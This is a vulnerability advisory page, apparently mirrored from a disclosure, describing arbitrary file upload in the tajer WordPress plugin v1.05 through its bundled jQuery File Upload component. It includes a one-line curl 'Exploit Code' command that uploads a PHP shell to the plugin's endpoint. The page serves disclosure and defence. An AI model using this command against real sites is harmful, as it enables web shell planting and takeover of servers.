WordPress Plugin tajer v1.05 Arbitrary file upload vulnerability

2018.10.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05 Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-15 [CVE-2018-9206] Download Site: https://wordpress.org/plugins/tajer Vendor: https://mostasharoon.org/ Vendor Notified: no Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=205 Description: Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products. Vulnerability: This plugin has components of Blueimp's jQuery file upload that is vulnerable to arbitrary file upload and code execution. Exploit Code: curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php

References:

http://www.vapidlabs.com/advisory.php?v=205


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top